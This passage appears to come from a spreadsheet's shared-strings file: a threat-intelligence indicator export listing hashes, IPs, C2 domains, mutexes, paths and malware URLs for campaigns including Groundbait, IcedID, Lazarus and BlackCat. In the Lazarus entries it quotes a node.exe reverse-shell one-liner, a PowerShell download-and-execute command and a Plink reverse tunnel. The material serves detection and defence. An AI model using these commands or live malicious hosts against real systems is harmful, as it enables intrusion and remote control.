    <t>1ba80558a948a2e2affe8cc0ac487be65c67eaa1f12acb87071ff34a95fc2f8a</t>
  </si>
  <si>
    <t>bfaa65989845f239db78488783fa72ba55037da1af409376c4e1926d545506cc</t>
  </si>
  <si>
    <t>1599553528</t>
  </si>
  <si>
    <t>https://twitter.com/1ZRR4H/status/1302983076335714304</t>
  </si>
  <si>
    <t>https://pastebin.com/Mx0JCkdH</t>
  </si>
  <si>
    <t>1599553680</t>
  </si>
  <si>
    <t>beed14bc183ad523b94ef6ac2b270b08</t>
  </si>
  <si>
    <t>1599553784</t>
  </si>
  <si>
    <t>https://www.virustotal.com/gui/file/b10d9a62edb6081aa9f7fc865554064bb212555392b1181dc40040e12927f988/details</t>
  </si>
  <si>
    <t>1599553782</t>
  </si>
  <si>
    <t>https://analyze.intezer.com/files/b10d9a62edb6081aa9f7fc865554064bb212555392b1181dc40040e12927f988</t>
  </si>
  <si>
    <t>1471170050</t>
  </si>
  <si>
    <t>1471170229</t>
  </si>
  <si>
    <t>https://krebsonsecurity.com/2016/08/visa-alert-and-update-on-the-oracle-breach/</t>
  </si>
  <si>
    <t>Oracle PoS hack</t>
  </si>
  <si>
    <t>http://krebsonsecurity.com/wp-content/uploads/2016/08/Visa-PFD-MICROS-Alert-12AUG16.pdf</t>
  </si>
  <si>
    <t>http://krebsonsecurity.com/wp-content/uploads/2016/08/carboracle.txt</t>
  </si>
  <si>
    <t>1471170130</t>
  </si>
  <si>
    <t>104.156.240.212</t>
  </si>
  <si>
    <t>104.232.35.136</t>
  </si>
  <si>
    <t>104.250.153.57</t>
  </si>
  <si>
    <t>107.181.246.211</t>
  </si>
  <si>
    <t>107.181.250.221</t>
  </si>
  <si>
    <t>108.61.57.43</t>
  </si>
  <si>
    <t>128.177.144.59</t>
  </si>
  <si>
    <t>144.168.45.128</t>
  </si>
  <si>
    <t>151.80.8.10</t>
  </si>
  <si>
    <t>162.212.105.78</t>
  </si>
  <si>
    <t>172.28.202.31</t>
  </si>
  <si>
    <t>184.22.81.68</t>
  </si>
  <si>
    <t>185.29.9.28</t>
  </si>
  <si>
    <t>185.86.149.115</t>
  </si>
  <si>
    <t>185.86.149.60</t>
  </si>
  <si>
    <t>186.106.120.113</t>
  </si>
  <si>
    <t>190.82.81.132</t>
  </si>
  <si>
    <t>194.146.180.58</t>
  </si>
  <si>
    <t>195.154.43.52</t>
  </si>
  <si>
    <t>198.23.210.156</t>
  </si>
  <si>
    <t>207.182.98.21</t>
  </si>
  <si>
    <t>208.167.254.234</t>
  </si>
  <si>
    <t>209.51.131.190</t>
  </si>
  <si>
    <t>216.155.131.74</t>
  </si>
  <si>
    <t>216.170.116.120</t>
  </si>
  <si>
    <t>220.130.157.99</t>
  </si>
  <si>
    <t>23.227.196.99</t>
  </si>
  <si>
    <t>23.249.164.109</t>
  </si>
  <si>
    <t>31.131.17.128</t>
  </si>
  <si>
    <t>45.63.23.135</t>
  </si>
  <si>
    <t>45.63.96.216</t>
  </si>
  <si>
    <t>5.45.179.185</t>
  </si>
  <si>
    <t>5.45.192.117</t>
  </si>
  <si>
    <t>51.254.95.100</t>
  </si>
  <si>
    <t>51.254.95.99</t>
  </si>
  <si>
    <t>59.55.142.171</t>
  </si>
  <si>
    <t>60.228.38.213/login.aspx</t>
  </si>
  <si>
    <t>66.232.124.175</t>
  </si>
  <si>
    <t>71.63.154.49</t>
  </si>
  <si>
    <t>72.233.55.10</t>
  </si>
  <si>
    <t>74.125.39.18</t>
  </si>
  <si>
    <t>80.83.118.240</t>
  </si>
  <si>
    <t>80.83.118.245</t>
  </si>
  <si>
    <t>82.163.78.188</t>
  </si>
  <si>
    <t>83.183.76.156</t>
  </si>
  <si>
    <t>85.186.125.217</t>
  </si>
  <si>
    <t>86.55.7.54</t>
  </si>
  <si>
    <t>87.236.210.109</t>
  </si>
  <si>
    <t>87.236.210.116</t>
  </si>
  <si>
    <t>87.98.153.34</t>
  </si>
  <si>
    <t>91.207.60.68</t>
  </si>
  <si>
    <t>94.140.120.133</t>
  </si>
  <si>
    <t>95.215.44.136</t>
  </si>
  <si>
    <t>95.215.45.228</t>
  </si>
  <si>
    <t>95.215.45.64</t>
  </si>
  <si>
    <t>95.215.45.69</t>
  </si>
  <si>
    <t>95.215.45.90</t>
  </si>
  <si>
    <t>95.215.45.98</t>
  </si>
  <si>
    <t>95.215.46.2</t>
  </si>
  <si>
    <t>95.215.46.32</t>
  </si>
  <si>
    <t>95.215.46.76</t>
  </si>
  <si>
    <t>95.85.12.179</t>
  </si>
  <si>
    <t>98.129.249.174</t>
  </si>
  <si>
    <t>1471170155</t>
  </si>
  <si>
    <t>clients14-google.com</t>
  </si>
  <si>
    <t>mail.clients12-google.com</t>
  </si>
  <si>
    <t>ns1.stats1-google.com</t>
  </si>
  <si>
    <t>ns2.stats1-google.com</t>
  </si>
  <si>
    <t>wambiri.net/login.aspx</t>
  </si>
  <si>
    <t>757ae5eed0c5e229ad9bae586f1281b5de053767</t>
  </si>
  <si>
    <t>2cf2f41d2454b59641a84f8180fd7e32135a0dbc</t>
  </si>
  <si>
    <t>f728bf7d6dbfc4c7bea21d6a3fd0b88f4fe52a4a</t>
  </si>
  <si>
    <t>798bc2d91293c18af7e99ba7c9a4fd3010051741</t>
  </si>
  <si>
    <t>90e85b471b64667dbcde3aee3fa504c0d4b0ad35</t>
  </si>
  <si>
    <t>fe713f9bb90b999250c3b6a3bba965d603de32a3</t>
  </si>
  <si>
    <t>d0b3562d868694fd1147e15483f88f3a78ebedfb</t>
  </si>
  <si>
    <t>1466510889</t>
  </si>
  <si>
    <t>1466510894</t>
  </si>
  <si>
    <t>http://www.welivesecurity.com/2016/05/18/groundbait/</t>
  </si>
  <si>
    <t>Operation Groundbait: Espionage in Ukrainian war zones</t>
  </si>
  <si>
    <t>Backdoor</t>
  </si>
  <si>
    <t>https://github.com/eset/malware-ioc/tree/master/groundbait</t>
  </si>
  <si>
    <t>1463642059</t>
  </si>
  <si>
    <t>54.175.208.187</t>
  </si>
  <si>
    <t>23.22.38.222</t>
  </si>
  <si>
    <t>disk-fulldatabase.rhcloud.com</t>
  </si>
  <si>
    <t>wallejob.in.ua</t>
  </si>
  <si>
    <t>185.68.16.35</t>
  </si>
  <si>
    <t>wallex.ho.ua</t>
  </si>
  <si>
    <t>91.228.146.13</t>
  </si>
  <si>
    <t>1463642060</t>
  </si>
  <si>
    <t>gils.ho.ua</t>
  </si>
  <si>
    <t>91.228.146.12</t>
  </si>
  <si>
    <t>literat.ho.ua</t>
  </si>
  <si>
    <t>lefting.org</t>
  </si>
  <si>
    <t>91.228.146.11</t>
  </si>
  <si>
    <t>celebrat.net</t>
  </si>
  <si>
    <t>bolepaund.com</t>
  </si>
  <si>
    <t>mutex</t>
  </si>
  <si>
    <t>1463642169</t>
  </si>
  <si>
    <t>ZxWinDeffContexLNKINFO64</t>
  </si>
  <si>
    <t>Zw_&amp;one@ldrContext43</t>
  </si>
  <si>
    <t>Paramore756Contex43</t>
  </si>
  <si>
    <t>ZxWinDeffContexSMD64</t>
  </si>
  <si>
    <t>ZxWinDeffContexWriteUSBIO64x</t>
  </si>
  <si>
    <t>ZxWinDeffContexRNDRV45scr</t>
  </si>
  <si>
    <t>ZxWinDeffContexRNDRV45snd</t>
  </si>
  <si>
    <t>ZxWinDeffContexSkSwmA</t>
  </si>
  <si>
    <t>ZxWinDeffContexKINP64</t>
  </si>
  <si>
    <t>ZxWinDeffContexRNDRV65</t>
  </si>
  <si>
    <t>ZxWinDeffContexRNDRV65new</t>
  </si>
  <si>
    <t>ZxWinDeffContexRNDRV65xyz</t>
  </si>
  <si>
    <t>ZxWinDeffContexRNDRV65xy</t>
  </si>
  <si>
    <t>ZxWinDeffContexRNDRV64</t>
  </si>
  <si>
    <t>Client67workProc98List3To</t>
  </si>
  <si>
    <t>1463642233</t>
  </si>
  <si>
    <t>%PROGRAMFILES%\IntelRestore\</t>
  </si>
  <si>
    <t>%USERPROFILE%\Resent\roaming\ocp8.1\</t>
  </si>
  <si>
    <t>%USERPROFILE%\AppData\Local\MMC\</t>
  </si>
  <si>
    <t>%USERPROFILE%\AppData\Local\PMG\</t>
  </si>
  <si>
    <t>%USERPROFILE%\AppData\Local\SKC\</t>
  </si>
  <si>
    <t>%USERPROFILE%\AppData\Local\CMS\</t>
  </si>
  <si>
    <t>1463642234</t>
  </si>
  <si>
    <t>%USERPROFILE%\AppData\Local\VRT\</t>
  </si>
  <si>
    <t>%USERPROFILE%\AppData\Local\ioctl\</t>
  </si>
  <si>
    <t>%WINDIR%\ntshrui.dll</t>
  </si>
  <si>
    <t>%WINDIR%\hauthuid.dll</t>
  </si>
  <si>
    <t>%WINDIR%\hlpuctf.dll</t>
  </si>
  <si>
    <t>%WINDIR%\atiml.dll</t>
  </si>
  <si>
    <t>%WINDIR%\iomus.dll</t>
  </si>
  <si>
    <t>%WINDIR%\swma.dll</t>
  </si>
  <si>
    <t>%WINDIR%\helpldr.dll</t>
  </si>
  <si>
    <t>%WINDIR%\rbcon.ini</t>
  </si>
  <si>
    <t>%USERPROFILE%\AppData\Local\CMS\krman.ini</t>
  </si>
  <si>
    <t>%USERPROFILE%\AppData\Local\VRT\_wputproc.dll</t>
  </si>
  <si>
    <t>1456267571</t>
  </si>
  <si>
    <t>1456267583</t>
  </si>
  <si>
    <t>d3109c83e07dd5d7fe032dc80c581d08</t>
  </si>
  <si>
    <t>APT29 HammerToss - FireEye</t>
  </si>
  <si>
    <t>1456267572</t>
  </si>
  <si>
    <t>doctorhandbook.com</t>
  </si>
  <si>
    <t>1456267573</t>
  </si>
  <si>
    <t>https://twitter.com/1abBob52b</t>
  </si>
  <si>
    <t>1456267574</t>
  </si>
  <si>
    <t>42e6da9a08802b5ce5d1f754d4567665637b47bc</t>
  </si>
  <si>
    <t>1456267575</t>
  </si>
  <si>
    <t>http://www.doctorhandbook.com</t>
  </si>
  <si>
    <t>1456267580</t>
  </si>
  <si>
    <t>www.doctorhandbook.com</t>
  </si>
  <si>
    <t>1598557689</t>
  </si>
  <si>
    <t>1598557795</t>
  </si>
  <si>
    <t>3ad57ab65124077ad38cbe279f9b55c9ff05a2aeeb1c29687c91d51b85b191ae</t>
  </si>
  <si>
    <t>TA551 (SHATHAK) Word documents with macros pushing ICEDID malware</t>
  </si>
  <si>
    <t>4fdb840b1e89d63f872cb2fb6097812f2999ed658fafec07129aff0195058c77</t>
  </si>
  <si>
    <t>62b07ac432c7bcbec2a420adadc3913306e97e8a6ec135a6528390b023297f25</t>
  </si>
  <si>
    <t>d0cf16b86ec4d8fd04d2119c12d810ba5bddad722ea235677d5bc1ba0980838f</t>
  </si>
  <si>
    <t>5230c218f578a6bed81886f833bcf6783a72c772e13d23dc2e8ff9296428c3b8</t>
  </si>
  <si>
    <t>ffd5c54ae8734eb3772eb739caa4599dea24006cc0861b4b09c46355286969c3</t>
  </si>
  <si>
    <t>c92e8a11bda1df35f28c5e418087ae622f1dddf57ea0a52c510517fa2a09b8bf</t>
  </si>
  <si>
    <t>a003a47a6a7069f36c77f6e333c6aa84fd5f19068d3a7e087d6e886b9632b599</t>
  </si>
  <si>
    <t>3cc33a1df4e15e6ad0e54a09667ac35e40bbeb090cb9a9ba813c9a47802a5edc</t>
  </si>
  <si>
    <t>eaa3e4e49a1e24bf534ec785a60b571eaae0057b92100ad36ccef13cb06140fa</t>
  </si>
  <si>
    <t>dbd1d4281ceeeb738d7ff5895fa7479eede72cb641f280c44084bb4ba5403722</t>
  </si>
  <si>
    <t>dddc52d6a2ad554e2475fa0833c5a6a20c4de9e87e2ecb35ab60cd64910cdbb5</t>
  </si>
  <si>
    <t>75fb7d24f60fd43104a90d3b09a0efcaa6346ea1e5d5f37a8eddd30098cf80a6</t>
  </si>
  <si>
    <t>66320ee80189794eda23be2f0afb20f91359391f3a0fe24968ef6dfb81e3fac5</t>
  </si>
  <si>
    <t>0a949c09cc96a16455f08d6a941b347f2bceb4a1561b76b84456ae986a906474</t>
  </si>
  <si>
    <t>3eacb3c075987a6e112ce5dabcdbce5d600a2f5e2ecb803dfe76b85300879d56</t>
  </si>
  <si>
    <t>1598557724</t>
  </si>
  <si>
    <t>c0sfgh.com</t>
  </si>
  <si>
    <t>Installer DLL</t>
  </si>
  <si>
    <t>193.187.174.157</t>
  </si>
  <si>
    <t>ehy2iyq.com</t>
  </si>
  <si>
    <t>62.109.24.18</t>
  </si>
  <si>
    <t>g8pf47.com</t>
  </si>
  <si>
    <t>185.62.103.65</t>
  </si>
  <si>
    <t>ltdcsz.com</t>
  </si>
  <si>
    <t>77.87.212.4</t>
  </si>
  <si>
    <t>ty5uaq.com</t>
  </si>
  <si>
    <t>185.117.73.52</t>
  </si>
  <si>
    <t>vuv7s5k.com</t>
  </si>
  <si>
    <t>185.219.41.227</t>
  </si>
  <si>
    <t>wirrhb.com</t>
  </si>
  <si>
    <t>45.89.67.57</t>
  </si>
  <si>
    <t>1598557739</t>
  </si>
  <si>
    <t>0083be8d814f433107dc77ed0b0d75ae6485e51526a437308df097b2de099086</t>
  </si>
  <si>
    <t>1a4b8543391d0ddfd919feddd5b09021c8441d971643eaae92f4e6ad114bab87</t>
  </si>
  <si>
    <t>255292813ce0ad650af7407017437c96790c5f5d4741f0acdd9a73a5f0fa8112</t>
  </si>
  <si>
    <t>37258621a30de267d09e0f722aafa48f8526cb52a5976d5816376e7080c31a68</t>
  </si>
  <si>
    <t>3ce817f1946f8c5c58f4928637e30268b63f7c837ce444d765b67d0681d70530</t>
  </si>
  <si>
    <t>408abe1bd67c1023ec64a2a39728a2d0e43e700f1769af49e92da21f34278053</t>
  </si>
  <si>
    <t>56982ec00725aef61b81dd101f82ee4e1c5aa4e7750c79cc20d184af198b22fd</t>
  </si>
  <si>
    <t>71325ea9483292726f6604855b3cb1ed907d957515b83661382de2b9f33c7e2e</t>
  </si>
  <si>
    <t>99d01c764171af578d6077e52788b0d75f181fdd4e80f2227ae2c473f5b3cca7</t>
  </si>
  <si>
    <t>9db1fd185fe301a98e74eb7054ce894972f6524525d4033ab253123f503840e3</t>
  </si>
  <si>
    <t>9fbef301703a0ed03cfd6c61a5522eb14ff9c834d97a53bf2b1eef5b54471763</t>
  </si>
  <si>
    <t>a88e307cb670ab541c95ae2b73b03dc1a038cf3a9f5dab21281d3aadb3abc1a8</t>
  </si>
  <si>
    <t>b6f0d81099f0bf43567af83bfeb0cd8eb8bbf006f5de72619f6bd25bda0695ff</t>
  </si>
  <si>
    <t>c7b031f4548d4f90f20876b89665e739bc7d2ec3136280abd706db7661f4e3f2</t>
  </si>
  <si>
    <t>e6f74e5db80b5174c7d6bbe494a038a119d016c49ce51b17fb758774095e8ad4</t>
  </si>
  <si>
    <t>eca49a13a5cbb36865e2d31adeb1344c6cd4fa72f01e46499f0f7a086bd4db38</t>
  </si>
  <si>
    <t>1598557773</t>
  </si>
  <si>
    <t>https://github.com/pan-unit42/iocs/blob/master/TA551/2020-08-18-TA551-IOCs-for-IcedID.txt</t>
  </si>
  <si>
    <t>1663002134</t>
  </si>
  <si>
    <t>1663009124</t>
  </si>
  <si>
    <t>https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html</t>
  </si>
  <si>
    <t>Scraper: Talos Website</t>
  </si>
  <si>
    <t>Malspam/Phishing</t>
  </si>
  <si>
    <t>1663002533</t>
  </si>
  <si>
    <t>84.38.133.145</t>
  </si>
  <si>
    <t>hosting platform for the actors' malicious tools</t>
  </si>
  <si>
    <t>1663002662</t>
  </si>
  <si>
    <t>%PROGRAMFILES%\\VMware"VMware View"\Server\appblastgateway\node.exe -r net -e "sh = require('child_process').exec('cmd.exe');var client = new net.Socket();client.connect(&lt;Port&gt;, '&lt;C2_IP&gt;', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"</t>
  </si>
  <si>
    <t>attackers abuse node.exe, which is shipped with VMware to execute the oneliner node.exe script</t>
  </si>
  <si>
    <t>1663002694</t>
  </si>
  <si>
    <t>powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://&lt;remote_location&gt;/&lt;filename&gt;.ps1')</t>
  </si>
  <si>
    <t>exploiting vulnerabilities in VMWare to launch custom PowerShell scripts on the infected endpoin</t>
  </si>
  <si>
    <t>1663002873</t>
  </si>
  <si>
    <t>pvhost.tmp</t>
  </si>
  <si>
    <t>pvhost.exe</t>
  </si>
  <si>
    <t>osc.tmp</t>
  </si>
  <si>
    <t>osc.exe</t>
  </si>
  <si>
    <t>1663002911</t>
  </si>
  <si>
    <t>%WINDIR%\system32\config\systemprofile\AppData\Roaming\microsoft\osc.exe -i127.0.0.1 -p8118</t>
  </si>
  <si>
    <t>the attackers start the osc.exe (3proxy) to listen on a loopback port (in this example, we chose 8118)</t>
  </si>
  <si>
    <t>1663002983</t>
  </si>
  <si>
    <t>%WINDIR%\system32\config\systemprofile\AppData\Roaming\microsoft\pvhost.exe -N -R 18118:127.0.0.1:8118 -P [Port] -l [username] -pw [password] &lt;Remote_IP&gt;</t>
  </si>
  <si>
    <t>an SSH tunnel using Plink, but they forwarded a local port to a remote address, in this case, a remote server controlled by the attackers</t>
  </si>
  <si>
    <t>1663003059</t>
  </si>
  <si>
    <t>586f30907c3849c363145bfdcdabe3e2e4688cbd5688ff968e984b201b474730</t>
  </si>
  <si>
    <t>VSingle</t>
  </si>
  <si>
    <t>8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5</t>
  </si>
  <si>
    <t>MagicRAT</t>
  </si>
  <si>
    <t>c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f</t>
  </si>
  <si>
    <t>dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469</t>
  </si>
  <si>
    <t>90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4</t>
  </si>
  <si>
    <t>f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb</t>
  </si>
  <si>
    <t>YamaBot</t>
  </si>
  <si>
    <t>16f413862efda3aba631d8a7ae2bfff6d84acd9f454a7adaa518c7a8a6f375a5</t>
  </si>
  <si>
    <t>Procdump</t>
  </si>
  <si>
    <t>05732e84de58a3cc142535431b3aa04efbe034cc96e837f93c360a6387d8faad</t>
  </si>
  <si>
    <t>1663003132</t>
  </si>
  <si>
    <t>6fbb771cd168b5d076525805d010ae0cd73b39ab1f4e6693148fe18b8f73090b</t>
  </si>
  <si>
    <t>Mimikatz</t>
  </si>
  <si>
    <t>912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9</t>
  </si>
  <si>
    <t>caf6739d50366e18c855e2206a86f64da90ec1cdf3e309aeb18ac22c6e28dc65</t>
  </si>
  <si>
    <t>2963a90eb9e499258a67d8231a3124021b42e6c70dacd3aab36746e51e3ce37e</t>
  </si>
  <si>
    <t>3Proxy</t>
  </si>
  <si>
    <t>2aa1bbbe47f04627a8ea4e8718ad21f0d50adf6a32ba4e6133ee46ce2cd13780</t>
  </si>
  <si>
    <t>PuTTY plink</t>
  </si>
  <si>
    <t>c92c158d7c37fea795114fa6491fe5f145ad2f8c08776b18ae79db811e8e36a3</t>
  </si>
  <si>
    <t>Adfind</t>
  </si>
  <si>
    <t>1663003141</t>
  </si>
  <si>
    <t>5a73fdd0c4d0deea80fa13121503b477597761d82cf2cfb0e9d8df469357e3f8</t>
  </si>
  <si>
    <t>1663003160</t>
  </si>
  <si>
    <t>104.155.149.103</t>
  </si>
  <si>
    <t>40.121.90.194</t>
  </si>
  <si>
    <t>185.29.8.162</t>
  </si>
  <si>
    <t>146.4.21.94</t>
  </si>
  <si>
    <t>46.183.221.109</t>
  </si>
  <si>
    <t>109.248.150.13</t>
  </si>
  <si>
    <t>155.94.210.11</t>
  </si>
  <si>
    <t>192.186.183.133</t>
  </si>
  <si>
    <t>54.68.42.4</t>
  </si>
  <si>
    <t>213.180.180.154</t>
  </si>
  <si>
    <t>1663003223</t>
  </si>
  <si>
    <t>http://104.155.149.103/2-443.ps1</t>
  </si>
  <si>
    <t>http://104.155.149.103/8080.ps1</t>
  </si>
  <si>
    <t>http://104.155.149.103/mi64.tmp</t>
  </si>
  <si>
    <t>http://104.155.149.103/mi.tmp</t>
  </si>
  <si>
    <t>http://104.155.149.103/mm.rar</t>
  </si>
  <si>
    <t>http://104.155.149.103/pd64.tmp</t>
  </si>
  <si>
    <t>http://104.155.149.103/rar.tmp</t>
  </si>
  <si>
    <t>http://104.155.149.103/spr.tmp</t>
  </si>
  <si>
    <t>http://104.155.149.103/t.tmp</t>
  </si>
  <si>
    <t>http://104.155.149.103/update.tmp</t>
  </si>
  <si>
    <t>http://109.248.150.13:8080/1</t>
  </si>
  <si>
    <t>http://146.4.21.94/tmp/data_preview/virtual.php</t>
  </si>
  <si>
    <t>http://185.29.8.162:443/1.tmp</t>
  </si>
  <si>
    <t>http://40.121.90.194/11.jpg</t>
  </si>
  <si>
    <t>http://40.121.90.194/300dr.cert</t>
  </si>
  <si>
    <t>http://40.121.90.194/b.cert</t>
  </si>
  <si>
    <t>http://40.121.90.194/qq.cert</t>
  </si>
  <si>
    <t>http://40.121.90.194/ra.cert</t>
  </si>
  <si>
    <t>http://40.121.90.194/Rar.jpg</t>
  </si>
  <si>
    <t>http://40.121.90.194/tt.rar</t>
  </si>
  <si>
    <t>http://46.183.221.109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/huntertroy.exe</t>
  </si>
  <si>
    <t>http://46.183.221.109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/svhostw.exe</t>
  </si>
  <si>
    <t>http://84.38.133.145/board.html</t>
  </si>
  <si>
    <t>http://84.38.133.145/header.xml</t>
  </si>
  <si>
    <t>http://www.ajoa.org/home/manager/template/calendar.php</t>
  </si>
  <si>
    <t>http://www.ajoa.org/home/rar.tmp</t>
  </si>
  <si>
    <t>http://www.ajoa.org/home/tmp.ps1</t>
  </si>
  <si>
    <t>http://www.ajoa.org/home/ztt.tmp</t>
  </si>
  <si>
    <t>http://www.orvi00.com/ez/admin/shop/powerline.tmp</t>
  </si>
  <si>
    <t>1663003253</t>
  </si>
  <si>
    <t>http://tecnojournals.com/review</t>
  </si>
  <si>
    <t>VSingle C2s</t>
  </si>
  <si>
    <t>http://semiconductboard.com/xml</t>
  </si>
  <si>
    <t>http://cyancow.com/find</t>
  </si>
  <si>
    <t>1663003274</t>
  </si>
  <si>
    <t>http://155.94.210.11/news/page.php</t>
  </si>
  <si>
    <t>MagicRAT C2s</t>
  </si>
  <si>
    <t>http://192.186.183.133/bbs/board.php</t>
  </si>
  <si>
    <t>http://213.32.46.0/board.php</t>
  </si>
  <si>
    <t>http://54.68.42.4/mainboard.php</t>
  </si>
  <si>
    <t>http://84.38.133.145/apollom/jeus.php</t>
  </si>
  <si>
    <t>http://mudeungsan.or.kr/gbbs/bbs/template/g_botton.php</t>
  </si>
  <si>
    <t>http://www.easyview.kr/board/Kheader.php</t>
  </si>
  <si>
    <t>http://www.easyview.kr/board/mb_admin.php</t>
  </si>
  <si>
    <t>1663003290</t>
  </si>
  <si>
    <t>http://213.180.180.154/editor/session/aaa000/support.php</t>
  </si>
  <si>
    <t>YamaBot C2s</t>
  </si>
  <si>
    <t>1650402409</t>
  </si>
  <si>
    <t>1650403133</t>
  </si>
  <si>
    <t>BlackCat/ALPHV ransomware leverages previously compromised user credentials to gain initial access to the victim system. Once the malware establishes access, it compromises Active Directory user and administrator accounts. The malware uses Windows Task Scheduler to configure malicious Group Policy Objects (GPOs) to deploy ransomware. Initial deployment of the malware leverages PowerShell scripts, in conjunction with Cobalt Strike, and disables security features within the victim’s network. BlackCat/ALPHV ransomware also leverages Windows administrative tools and Microsoft Sysinternals tools during compromise.</t>
  </si>
  <si>
    <t>BlackCat/ALPHV Ransomware Indicators of Compromise</t>
  </si>
  <si>
    <t>BlackCat/ALPHV steals victim data prior to the execution of the ransomware, including from cloud providers where company or client data was stored.</t>
  </si>
  <si>
    <t>1650402864</t>
  </si>
  <si>
    <t>6c2874169fdfb30846fe7ffe34635bdb</t>
  </si>
  <si>
    <t>Executables and DLLs</t>
  </si>
  <si>
    <t>20855475d20d252dda21287264a6d860</t>
  </si>
  <si>
    <t>82db4c04f5dcda3bfcd75357adf98228</t>
  </si>
  <si>
    <t>fcf3a6eeb9f836315954dae03459716d</t>
  </si>
  <si>
    <t>91625f7f5d590534949ebe08cc728380</t>
  </si>
  <si>
    <t>1650402886</t>
  </si>
  <si>
    <t>d241df7b9d2ec0b8194751cd5ce153e27cc40fa4</t>
  </si>
  <si>
    <t>4831c1b113df21360ef68c450b5fca278d08fae2</t>
  </si>
  <si>
    <t>fce13da5592e9e120777d82d27e06ed2b44918cf</t>
  </si>
  <si>
    <t>3f85f03d33b9fe25bcfac611182da4ab7f06a442</t>
  </si>
  <si>
    <t>37178dfaccbc371a04133d26a55127cf4d4382f8</t>
  </si>
  <si>
    <t>1b2a30776df64fbd7299bd588e21573891dcecbe</t>
  </si>
  <si>
    <t>1650402917</t>
  </si>
  <si>
    <t>731adcf2d7fb61a8335e23dbee2436249e5d5753977ec465754c6b699e9bf161</t>
  </si>
  <si>
    <t>BlackCat Ransomware SHA256 Hashes</t>
  </si>
  <si>
    <t>f837f1cd60e9941aa60f7be50a8f2aaaac380f560db8ee001408f35c1b7a97cb</t>
  </si>
  <si>
    <t>80dd44226f60ba5403745ba9d18490eb8ca12dbc9be0a317dd2b692ec041da28</t>
  </si>
  <si>
    <t>1650403070</t>
  </si>
  <si>
    <t>89.44.9.243</t>
  </si>
  <si>
    <t>C2 IPs</t>
  </si>
  <si>
    <t>37.120.238.58</t>
  </si>
  <si>
    <t>45.153.160.140</t>
  </si>
  <si>
    <t>142.234.157.246</t>
  </si>
  <si>
    <t>152.89.247.207</t>
  </si>
  <si>
    <t>23.106.223.97</t>
  </si>
  <si>
    <t>45.134.20.66</t>
  </si>
  <si>
    <t>198.144.121.93</t>
  </si>
  <si>
    <t>1650403046</t>
  </si>
  <si>
    <t>185.220.102.253</t>
  </si>
  <si>
    <t>89.163.252.230</t>
  </si>
  <si>
    <t>146.0.77.15</t>
  </si>
  <si>
    <t>139.60.161.161</t>
  </si>
  <si>
    <t>94.232.41.155</t>
  </si>
  <si>
    <t>1650403119</t>
  </si>
  <si>
    <t>CU-000167-MW</t>
  </si>
  <si>
    <t>FBI-FLASH - 19 April 2022</t>
  </si>
  <si>
    <t>1650402447</t>
  </si>
  <si>
    <t>start.bat</t>
  </si>
  <si>
    <t>10ed7a08-d81b-4a3f-bc65-5124dabd9b9a</t>
  </si>
  <si>
    <t>1650402475</t>
  </si>
  <si>
    <t>est.bat</t>
  </si>
  <si>
    <t>96c88143-daba-484a-ae7c-c955d126219e</t>
  </si>
  <si>
    <t>1650402824</t>
  </si>
  <si>
    <t>e7ee8ea6fb7530d1d904cdb2d9745899</t>
  </si>
  <si>
    <t>1650402500</t>
  </si>
  <si>
    <t>drag-and-drop-target.bat</t>
  </si>
  <si>
    <t>8747698d-a55d-4717-ac71-d5016b276585</t>
  </si>
  <si>
    <t>1650402528</t>
  </si>
  <si>
    <t>run.bat</t>
  </si>
  <si>
    <t>a7e129fe-e124-4f3e-9134-64c991062bee</t>
  </si>
  <si>
    <t>1650402553</t>
  </si>
  <si>
    <t>Runs1.ps</t>
  </si>
  <si>
    <t>fb96850a-04e3-4f5c-a7b0-9012485312b8</t>
  </si>
  <si>
    <t>1650402582</t>
  </si>
  <si>
    <t>09bc47d7bc5e40d40d9729cec5e39d73</t>
  </si>
  <si>
    <t>1650402612</t>
  </si>
  <si>
    <t>9f60dd752e7692a2f5c758de4eab3e6f</t>
  </si>
  <si>
    <t>cfe4dc7b-7ef0-40ae-a1d0-5d3e68b7f33a</t>
  </si>
  <si>
    <t>ipscan.ps1</t>
  </si>
  <si>
    <t>1650402632</t>
  </si>
  <si>
    <t>861738dd15eb7fb50568f0e39a69e107</t>
  </si>
  <si>
    <t>d295b367-ee30-47c9-9eaa-2b7158b1860a</t>
  </si>
  <si>
    <t>amd - Copy.ps1</t>
  </si>
  <si>
    <t>1650402702</t>
  </si>
  <si>
    <t>f5ef5142f044b94ac5010fd883c09aa7</t>
  </si>
  <si>
    <t>995ff203-119e-47d2-9df7-ee956f299de7</t>
  </si>
  <si>
    <t>CheckVuln.bat</t>
  </si>
  <si>
    <t>1650402736</t>
  </si>
  <si>
    <t>84e3b5fe3863d25bb72e25b10760e861</t>
  </si>
  <si>
    <t>c2284e33-7f5e-4cc4-ad74-86a7869926bf</t>
  </si>
  <si>
    <t>Create-share-RunAsAdmin.bat</t>
  </si>
  <si>
    <t>1650402762</t>
  </si>
  <si>
    <t>9f2309285e8a8471fce7330fcade8619</t>
  </si>
  <si>
    <t>ba617fd1-85e3-419d-ac4f-4bb8b6613a20</t>
  </si>
  <si>
    <t>LPE-Exploit-RunAsUser.bat</t>
  </si>
  <si>
    <t>1650402783</t>
  </si>
  <si>
    <t>6c6c46bdac6713c94debbd454d34efd9</t>
  </si>
  <si>
    <t>5d0fcc07-4c41-44fa-bca6-d33d4730f36c</t>
  </si>
  <si>
    <t>RCE-Exploit-RunAsUser.bat</t>
  </si>
  <si>
    <t>1650402844</t>
  </si>
  <si>
    <t>815bb1b0c5f0f35f064c55a1b640fca5</t>
  </si>
  <si>
    <t>f8551d92-4f4a-421d-a6da-f885c04a52d8</t>
  </si>
  <si>
    <t>runav.bat</t>
  </si>
  <si>
    <t>1471591222</t>
  </si>
  <si>
    <t>1471591431</t>
  </si>
  <si>
    <t>http://glazeautocaree.com/proforma-invoice.exe</t>
  </si>
